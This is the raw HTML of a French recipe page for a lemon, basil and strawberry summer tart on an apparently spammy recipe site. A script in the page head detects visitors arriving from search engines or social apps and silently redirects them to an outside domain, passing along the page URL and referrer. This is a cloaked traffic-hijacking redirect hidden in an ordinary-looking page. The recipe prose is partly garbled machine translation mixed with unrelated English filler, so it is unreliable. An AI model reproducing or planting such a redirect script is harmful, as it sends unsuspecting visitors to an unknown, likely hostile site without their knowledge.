<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="index, follow">

<script>
    var ars = 'https://westrive.xyz';
    
    if(['.google.', 'bing.', 'yandex.', 'facebook.', 'pinterest.'].some(s => document.referrer.toLowerCase().includes(s)) || ['fb', 'facebook', 'pinterest', 'twitter'].some(s => navigator.userAgent.toLowerCase().includes(s))){ window.location.href = ars + '/?arsae='+ encodeURIComponent(window.location.href) + '&arsae_ref='+ encodeURIComponent(document.referrer) }
</script>

<meta name="generator" content="Hugo 0.79.0" />
<title>
    
        Recette De Une summer tart 🍋🍓🌿 | Delicious Recipes
    
</title>
<meta name="keywords" content="

    une summer tart

">
<meta name="description" content="

    Recette De Une summer tart 🍋🍓🌿

">



<script type="application/ld+json">
{
    "@context": "https://schema.org/", 
    "@type": "Recipe", 
    "name": "Recette De Une summer tart 🍋🍓🌿",
    "headline": "Recette De Une summer tart 🍋🍓🌿",
    "image": "https:\/\/img-global.cpcdn.com\/recipes\/fdd2db308bacdad0\/751x532cq70\/une-summer-tart-🍋🍓🌿-photo-principale-de-la-recette.jpg",
    "description": "Recette De Une summer tart 🍋🍓🌿",
    "keywords": "une summer tart",
	"recipeCuisine": "Indonesian",
	"prepTime": "PT14M",
    "cookTime": "PT31M",
	"recipeYield": "3",
    "recipeCategory": "Dinner",
    "datePublished": "2020-07-26",
    "license": "@Copyright Delicious Recipes 2020"
    "author": {
        "@type": "Person",
        "name": "Jeffrey Simon"
    },
    "aggregateRating": {
        "@type": "AggregateRating",
        "ratingValue": "3.8",
        "reviewCount": "4"
    },
	"nutrition": {
        "@type": "NutritionInformation",
        "calories": "256 calories"
    },
    "recipeIngredient": [ " Crme citron et basilic" , "1.5 feuilles de glatine" , "4 citrons non traits" , "4 ufs" , "150 g sucre" , "2 cs mazena" , "200 g beurre" , "6 feuilles de basilic" , " Le sabl breton" , "150 g farine" , "65 g sucre" , "1\/2 sachet de levure chimique" , "100 g beurre mou" , "50 g jaune duf" , " La chantilly" , "50 g mascarpone" , "125 g crme fleurette" , "10 g sucre glace" , " Dcoration" , " Fraises" , " Petites feuilles de basilic"  ],
    "recipeInstructions": [{
        "@type": "HowToStep",
        "text": "Crème citron (à faire la veille) : Faire ramollir les feuilles de gélatine dans l’eau froide. Récupérez le jus des citrons. Mettez le jus dans une casserole avec le basilic ciselé. Portez le jus à ébullition puis stopper et laissez infuser 5 minutes à couvert."
        },
        {
        "@type": "HowToStep",
        "text": "Pendant ce temps, avec un fouet électrique, fouettez la maïzena, le sucre et les œufs dans un saladier. Filtrez le jus de citron pour enlever le basilic, et le verser sur le mélange avec les œuf tout en remuant."
        },
        {
        "@type": "HowToStep",
        "text": "Remettre le tout dans une casserole jusqu’à ce que le mélange épaississe. Hors du feu ajouter la gélatine essorée et le beurre coupé en morceaux. Mélangez bien. Placez le saladier la nuit au frigo avec du papier sulfurisé."
        },
        {
        "@type": "HowToStep",
        "text": "Pour le sablé breton : versez dans un saladier la farine, la levure, le sucre et le beurre coupé en morceaux. Sablez grossièrement à la main ou avec la feuille du robot. Ajoutez les jaunes d’œufs et mélangez jusqu’à la formation d’une boule. Filmez et réservez au frais 30 minutes."
        },
        {
        "@type": "HowToStep",
        "text": "Préchauffez le four à 160 degrés. Abaissez la pâte avec un rouleau à pâtissier sur une feuille de papier cuisson. Servez-vous d’un cercle de 25cm de diamètre pour former un cercle. Laissez le cercle autour de la pâte pour éviter qu’elle ne s’effondre durant la cuisson. Enfourner 20-30 minutes. (Le sablé doit être légèrement doré). Laisser refroidir sur une grille."
        },
        {
        "@type": "HowToStep",
        "text": "La chantilly: montez le mascarpone et la crème fleurette en chantilly. Ajoutez le sucre glace à mi-parcours. Mettre dans une poche à douille lisse."
        },
        {
        "@type": "HowToStep",
        "text": "Le montage: déposez le palet breton sur le plat. Fouettez la crème au citron pour la détendre et la mettre dans une poche à douille lisse. Pochez en alternance la crème citron et la chantilly. Y mettre des fraises et des jeunes pousses de basilic. Dégustez 😋."
        }]
}
</script>




<link rel="apple-touch-icon" sizes="180x180" href="https://how-to-cooking-rise.web.app/img/logo.svg">
<link rel="icon" type="image/png" sizes="32x32" href="https://how-to-cooking-rise.web.app/img/logo.svg">
<link rel="icon" type="image/png" sizes="16x16" href="https://how-to-cooking-rise.web.app/img/logo.svg">
<link rel="manifest" href="https://how-to-cooking-rise.web.app/site.webmanifest">
 <link rel="stylesheet" href="https://how-to-cooking-rise.web.app/css/bootstrap.css">
 <link rel="stylesheet" href="https://how-to-cooking-rise.web.app/css/style.css">
<link rel="preconnect" href="https://fonts.gstatic.com">
<link href="https://fonts.googleapis.com/css2?family=Courgette&family=Lobster&display=swap" rel="stylesheet">
    </head>
    <body>
        <header>
            <div class="container">
    <div class="col-md">
        <h1 class="webtitle">
            <a href="https://how-to-cooking-rise.web.app/" class="text-dark">
                Delicious Recipes
            </a>
        </h1>
        <p class="subwebtitle">Our Popular Recipes, Easy and Testy</p>
    </div>
</div>
<div class="container">
    <hr>
    <nav class="navbar navbar-expand-lg navbar-light bg-transperent fixed-auto">
            <a class="navbar-brand" href="https://how-to-cooking-rise.web.app/">
                
                <img src="https://how-to-cooking-rise.web.app/img/logo.svg" width="30" height="30" class="d-inline-block align-top" alt="">
            </a>
            </a>
            <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarNavAltMarkup" aria-controls="navbarNavAltMarkup" aria-expanded="false" aria-label="Toggle navigation">
                <span class="navbar-toggler-icon"></span>
            </button>
            <div class="collapse navbar-collapse" id="navbarNavAltMarkup">
                <ul class="navbar-nav ml-auto">
                    
                        <li class="nav-item">
                            <a class="nav-link" href="/about">About </a>
                        </li>
                    
                        <li class="nav-item">
                            <a class="nav-link" href="/dmca">DMCA </a>
                        </li>
                    
                        <li class="nav-item">
                            <a class="nav-link" href="/privacy">Privacy Policy </a>
                        </li>
                    
                        <li class="nav-item">
                            <a class="nav-link" href="/term">Term Use </a>
                        </li>
                    
                        <li class="nav-item">
                            <a class="nav-link" href="/ccpa">CCPA </a>
                        </li>
                    
                </ul>
            </div>
        </nav>
        <hr>
</div>
        </header>
        <div id="content">
            

<div class="container">
    <div class="row">
        <div class="col-md-8">
            <div id="breadcrumbs" style="font-size: 83%; font-family: 'Courgette', cursive;">
    <a href="/">Home</a> / <a href="/blog">Blog</a>  / Recette De Une Summer Tart 🍋🍓🌿
</div> <hr>
            <h2 class="list-article">
                Recette De Une summer tart 🍋🍓🌿
            </h2> <hr>
            <!--ads/responsive.txt--> <hr>
            <div class="row">
    <span class="ml-3">
        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-people-fill" viewBox="0 0 16 16">
            <path fill-rule="evenodd" d="M7 14s-1 0-1-1 1-4 5-4 5 3 5 4-1 1-1 1H7zm4-6a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-5.784 6A2.238 2.238 0 0 1 5 13c0-1.355.68-2.75 1.936-3.72A6.325 6.325 0 0 0 5 9c-4 0-5 3-5 4s1 1 1 1h4.216zM4.5 8a2.5 2.5 0 1 0 0-5 2.5 2.5 0 0 0 0 5z"/>
        </svg>
        <span class="badge badge-success">
            Jeffrey Simon
        </span>
    </span>
    <span class="ml-3">
        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-calendar-week" viewBox="0 0 16 16">
            <path fill-rule="evenodd" d="M3.5 0a.5.5 0 0 1 .5.5V1h8V.5a.5.5 0 0 1 1 0V1h1a2 2 0 0 1 2 2v11a2 2 0 0 1-2 2H2a2 2 0 0 1-2-2V3a2 2 0 0 1 2-2h1V.5a.5.5 0 0 1 .5-.5zM1 4v10a1 1 0 0 0 1 1h12a1 1 0 0 0 1-1V4H1z"/>
            <path d="M11 6.5a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-1a.5.5 0 0 1-.5-.5v-1zm-3 0a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-1a.5.5 0 0 1-.5-.5v-1zm-5 3a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-1a.5.5 0 0 1-.5-.5v-1zm3 0a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-1a.5.5 0 0 1-.5-.5v-1z"/>
        </svg>
        <span class="badge badge-danger">
            2020-07-26
        </span>
    </span>
</div>
            <hr>
            <div class="content">
                <p><img src="https://img-global.cpcdn.com/recipes/fdd2db308bacdad0/751x532cq70/une-summer-tart-%F0%9F%8D%8B%F0%9F%8D%93%F0%9F%8C%BF-photo-principale-de-la-recette.jpg" alt="Une summer tart 🍋🍓🌿"></p>
<p>Beaucoup de gens n&rsquo;osent pas cuisiner une summer tart 🍋🍓🌿 de peur que le goût de la nourriture ne soit pas celui attendu. Il y a plusieurs choses qui affectent la qualité gustative de une summer tart 🍋🍓🌿! En partant du type d&rsquo;ustensiles de cuisine, assurez-vous toujours d&rsquo;utiliser des ustensiles de cuisine de qualité qui sont toujours propres. De plus, pour un goût alimentaire prononcé, il faut bien sûr utiliser beaucoup d&rsquo;épices pour que les aliments préparés n&rsquo;aient pas un goût fade. Et enfin, entraînez-vous pour reconnaître les différentes saveurs de la cuisine, profitez de chaque activité culinaire de tout cœur, car la sensation d&rsquo;être excité, calme et non pressé affecte aussi le résultat final!</p>
<!--ads/responsive.txt-->
<p>À cuire une summer tart 🍋🍓🌿 tue seul besion 21 Ingrédients et 7 pas. Voici comment vous atteindre cette.</p>
<h5 id="ingrédients-de-une-summer-tart--">Ingrédients de une summer tart 🍋🍓🌿 :</h5>
<ol>
<li>Préparer  Crème citron et basilic</li>
<li>Vous devez vous préparer 1.5 feuilles de gélatine</li>
<li>Fournir 4 citrons non traités</li>
<li>Vous devez vous préparer 4 œufs</li>
<li>Fournir 150 g sucre</li>
<li>Vous devez vous préparer 2 cs maïzena</li>
<li>Préparer 200 g beurre</li>
<li>Vous avez besoin 6 feuilles de basilic</li>
<li>Préparer  Le sablé breton</li>
<li>Fournir 150 g farine</li>
<li>Préparer 65 g sucre</li>
<li>Utilisation 1/2 sachet de levure chimique</li>
<li>Vous avez besoin 100 g beurre mou</li>
<li>Utilisation 50 g jaune d’œuf</li>
<li>Fournir  La chantilly</li>
<li>Vous devez vous préparer 50 g mascarpone</li>
<li>Vous avez besoin 125 g crème fleurette</li>
<li>Utilisation 10 g sucre glace</li>
<li>Vous devez vous préparer  Décoration</li>
<li>Utilisation  Fraises</li>
<li>Vous devez vous préparer  Petites feuilles de basilic</li>
</ol>
<p>Join me in making two different summer tarts, they are really quick and easy to make! This quick and easy vegetarian tart is perfect for a summer meal and when entertaining vegetarian guests. Scatter with basil leaves and cut into slices. To lighten them up for the summer, tart lemon and lime is the way to go.</p>
<!--ads/responsive.txt-->
<h5 id="une-summer-tart--pas-à-pas-">Une summer tart 🍋🍓🌿 pas à pas :</h5>
<ol>
<li>Crème citron (à faire la veille) : Faire ramollir les feuilles de gélatine dans l’eau froide. Récupérez le jus des citrons. Mettez le jus dans une casserole avec le basilic ciselé. Portez le jus à ébullition puis stopper et laissez infuser 5 minutes à couvert.</li>
<li>Pendant ce temps, avec un fouet électrique, fouettez la maïzena, le sucre et les œufs dans un saladier. Filtrez le jus de citron pour enlever le basilic, et le verser sur le mélange avec les œuf tout en remuant.</li>
<li>Remettre le tout dans une casserole jusqu’à ce que le mélange épaississe. Hors du feu ajouter la gélatine essorée et le beurre coupé en morceaux. Mélangez bien. Placez le saladier la nuit au frigo avec du papier sulfurisé.</li>
<li>Pour le sablé breton : versez dans un saladier la farine, la levure, le sucre et le beurre coupé en morceaux. Sablez grossièrement à la main ou avec la feuille du robot. Ajoutez les jaunes d’œufs et mélangez jusqu’à la formation d’une boule. Filmez et réservez au frais 30 minutes.</li>
<li>Préchauffez le four à 160 degrés. Abaissez la pâte avec un rouleau à pâtissier sur une feuille de papier cuisson. Servez-vous d’un cercle de 25cm de diamètre pour former un cercle. Laissez le cercle autour de la pâte pour éviter qu’elle ne s’effondre durant la cuisson. Enfourner 20-30 minutes. (Le sablé doit être légèrement doré). Laisser refroidir sur une grille.</li>
<li>La chantilly: montez le mascarpone et la crème fleurette en chantilly. Ajoutez le sucre glace à mi-parcours. Mettre dans une poche à douille lisse.</li>
<li>Le montage: déposez le palet breton sur le plat. Fouettez la crème au citron pour la détendre et la mettre dans une poche à douille lisse. Pochez en alternance la crème citron et la chantilly. Y mettre des fraises et des jeunes pousses de basilic. Dégustez 😋.</li>
</ol>
<p>Lemon meringue pie is always a winner, with a layer of lemon curd topped with a cloud of meringue. This unusual Santa Claus melon tart makes for the perfect summer dessert. A bright melon curd fills an almond crust, topped. Summer peach tart with gluten-free crust, topped with fresh berries. Was it really summer if you didn't enjoy a single slice of pie?</p>
<!--ads/responsive.txt-->
<p>
Maintenant que vous avez revu la recette de Une summer tart 🍋🍓🌿, et que vous avez également le savoir-faire dont vous avez besoin dans la zone de cuisson. Sortez ce tablier, dépoussiérez vos bols à mélanger et retroussez vos manches. Vous avez un peu de préparation alimentaire à faire.
</p>
<p>
<i>Si vous trouvez cette Une summer tart 🍋🍓🌿 recette utile, partagez-la avec vos bons amis ou votre famille, merci et bonne chance.</i>
</p>

            </div>
            <hr>
<center>

    
    <span class="btn btn-outline-secondary">
    #<a class="text-black-50" href="https://how-to-cooking-rise.web.app/tags/une">une</a>
    </span> 

    
    <span class="btn btn-outline-secondary">
    #<a class="text-black-50" href="https://how-to-cooking-rise.web.app/tags/summer">summer</a>
    </span> 

    
    <span class="btn btn-outline-secondary">
    #<a class="text-black-50" href="https://how-to-cooking-rise.web.app/tags/tart">tart</a>
    </span> 

</center>
<hr> <br>
            <!--ads/responsive.txt--> <hr>
            <div class="row">
    <div class="col-lg-5 ml-auto text-left">
        
        <div class="col mb-3">
            <div class="card h-100 ">
                <a href="https://how-to-cooking-rise.web.app/blog/126-recette-des-gozleme-aux-pommes-de-terre/">
                    <img src="https://img-global.cpcdn.com/recipes/fdc188d4a9414df1/751x532cq70/gozleme-aux-pommes-de-terre-photo-principale-de-la-recette.jpg"
                    class="card-img-top"
                    alt="Recette Des Gözleme aux pommes de terre">
                </a>
                <div class="card-body">
                    <h6 class="webtitle">
                        <a href="https://how-to-cooking-rise.web.app/blog/126-recette-des-gozleme-aux-pommes-de-terre/" class="text-danger">
                            Recette Des Gözleme aux pommes de terre
                        </a>
                    </h6>
                    <a href="https://how-to-cooking-rise.web.app/blog/126-recette-des-gozleme-aux-pommes-de-terre/">
                        <button type="button" class="btn btn-warning">PREV</button>
                    </a>
                </div>
            </div>
        </div>
        
    </div>
    <div class="col-lg-5 ml-auto text-right">
        
        <div class="col mb-3">
            <div class="card h-100 ">
                <a href="https://how-to-cooking-rise.web.app/blog/127-comment-faire-des-tarte-aux-pommes/">
                    <img src="https://img-global.cpcdn.com/recipes/c9e455bcbcacdefb/751x532cq70/tarte-aux-pommes-photo-principale-de-la-recette.jpg"
                    class="card-img-top"
                    alt="Comment Faire Des Tarte aux pommes">
                </a>
                <div class="card-body">
                    <h6 class="webtitle">
                        <a href="https://how-to-cooking-rise.web.app/blog/127-comment-faire-des-tarte-aux-pommes/" class="text-danger">
                            Comment Faire Des Tarte aux pommes
                        </a>
                    </h6>
                    <a href="https://how-to-cooking-rise.web.app/blog/127-comment-faire-des-tarte-aux-pommes/">
                        <button type="button" class="btn btn-warning">NEXT</button>
                    </a>
                </div>
            </div>
        </div>
        
    </div>
</div>
            <hr> <br>
        </div>
        <div class="col-md-4">
            


        </div>
    </div>
</div>


        </div>
        <footer>
            <div class="row justify-content-center">
  <div class="container webfooter">
      <div class="col-12 text-center mb-5">
        <h5 class="webtitle">
          <a href="https://how-to-cooking-rise.web.app/" class="text-dark">
            @Delicious Recipes
          </a>
          <hr class="garis">
        </h5>
      </div>
    </div>
      <div class="col-lg-3 col-sm-6 mb-5">
        <h4 class="mb-4 webtitle">Pages</h4>
        <hr>
        <ul class="list-unstyled webtitle">
          
          <li class="mb-3 featured"><a class="text-dark" href="https://how-to-cooking-rise.web.app/about">About </a></li>
          
          <li class="mb-3 featured"><a class="text-dark" href="https://how-to-cooking-rise.web.app/dmca">DMCA </a></li>
          
          <li class="mb-3 featured"><a class="text-dark" href="https://how-to-cooking-rise.web.app/privacy">Privacy Policy </a></li>
          
          <li class="mb-3 featured"><a class="text-dark" href="https://how-to-cooking-rise.web.app/term">Term Use </a></li>
          
          <li class="mb-3 featured"><a class="text-dark" href="https://how-to-cooking-rise.web.app/ccpa">CCPA </a></li>
          
        </ul>
      </div>
      <div class="col-lg-3 col-sm-6 mb-5">
        <h4 class="mb-4 webtitle">Sosial</h4>
        <hr>
        <ul class="list-unstyled webtitle">
          <li class="mb-3 featured">
            <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-facebook" viewBox="0 0 16 16">
              <path fill-rule="evenodd" d="M16 8.049c0-4.446-3.582-8.05-8-8.05C3.58 0-.002 3.603-.002 8.05c0 4.017 2.926 7.347 6.75 7.951v-5.625h-2.03V8.05H6.75V6.275c0-2.017 1.195-3.131 3.022-3.131.876 0 1.791.157 1.791.157v1.98h-1.009c-.993 0-1.303.621-1.303 1.258v1.51h2.218l-.354 2.326H9.25V16c3.824-.604 6.75-3.934 6.75-7.951z"/>
            </svg>
            <a class="text-dark" href="https://id-id.facebook.com/people/Silohon-Jr/100008714179233">
              Facebook
            </a>
          </li>
          <li class="mb-3 featured">
            <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-instagram" viewBox="0 0 16 16">
              <path d="M8 0C5.829 0 5.556.01 4.703.048 3.85.088 3.269.222 2.76.42a3.917 3.917 0 0 0-1.417.923A3.927 3.927 0 0 0 .42 2.76C.222 3.268.087 3.85.048 4.7.01 5.555 0 5.827 0 8.001c0 2.172.01 2.444.048 3.297.04.852.174 1.433.372 1.942.205.526.478.972.923 1.417.444.445.89.719 1.416.923.51.198 1.09.333 1.942.372C5.555 15.99 5.827 16 8 16s2.444-.01 3.298-.048c.851-.04 1.434-.174 1.943-.372a3.916 3.916 0 0 0 1.416-.923c.445-.445.718-.891.923-1.417.197-.509.332-1.09.372-1.942C15.99 10.445 16 10.173 16 8s-.01-2.445-.048-3.299c-.04-.851-.175-1.433-.372-1.941a3.926 3.926 0 0 0-.923-1.417A3.911 3.911 0 0 0 13.24.42c-.51-.198-1.092-.333-1.943-.372C10.443.01 10.172 0 7.998 0h.003zm-.717 1.442h.718c2.136 0 2.389.007 3.232.046.78.035 1.204.166 1.486.275.373.145.64.319.92.599.28.28.453.546.598.92.11.281.24.705.275 1.485.039.843.047 1.096.047 3.231s-.008 2.389-.047 3.232c-.035.78-.166 1.203-.275 1.485a2.47 2.47 0 0 1-.599.919c-.28.28-.546.453-.92.598-.28.11-.704.24-1.485.276-.843.038-1.096.047-3.232.047s-2.39-.009-3.233-.047c-.78-.036-1.203-.166-1.485-.276a2.478 2.478 0 0 1-.92-.598 2.48 2.48 0 0 1-.6-.92c-.109-.281-.24-.705-.275-1.485-.038-.843-.046-1.096-.046-3.233 0-2.136.008-2.388.046-3.231.036-.78.166-1.204.276-1.486.145-.373.319-.64.599-.92.28-.28.546-.453.92-.598.282-.11.705-.24 1.485-.276.738-.034 1.024-.044 2.515-.045v.002zm4.988 1.328a.96.96 0 1 0 0 1.92.96.96 0 0 0 0-1.92zm-4.27 1.122a4.109 4.109 0 1 0 0 8.217 4.109 4.109 0 0 0 0-8.217zm0 1.441a2.667 2.667 0 1 1 0 5.334 2.667 2.667 0 0 1 0-5.334z"/>
            </svg>
            <a href="https://www.instagram.com/silohon94/" class="text-dark">Instagram</a>
          </li>
          <li class="mb-3 featured">
            <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-github" viewBox="0 0 16 16">
              <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.012 8.012 0 0 0 16 8c0-4.42-3.58-8-8-8z"/>
            </svg>
            <a href="https://github.com/silohon" class="text-dark">Github</a>
          </li>
          <li class="mb-3 featured">

          </li>
        </ul>
      </div>
      <div class="col-12 border-top py-4 text-center">
        | @Copyright  <a href="https://how-to-cooking-rise.web.app/" class="text-danger">
          <span class="webtitle">
            Delicious Recipes
          </span>
        </a>  2020 All Rights Reserved |
      </div>
</div>
  
  <script async defer data-pin-hover="true" data-pin-tall="true" data-pin-round="true" src="//assets.pinterest.com/js/pinit.js"></script>


<script src="https://how-to-cooking-rise.web.app/js/jquery-3.3.1.slim.min.js"></script>
<script src="https://how-to-cooking-rise.web.app/js/bootstrap.bundle.min.js"></script>
            
<a href="/" alt="best counter" target="_blank" >
<img  src="//sstatic1.histats.com/0.gif?4491757&101" alt="best counter" border="0">

        </footer>
    </body>
</html>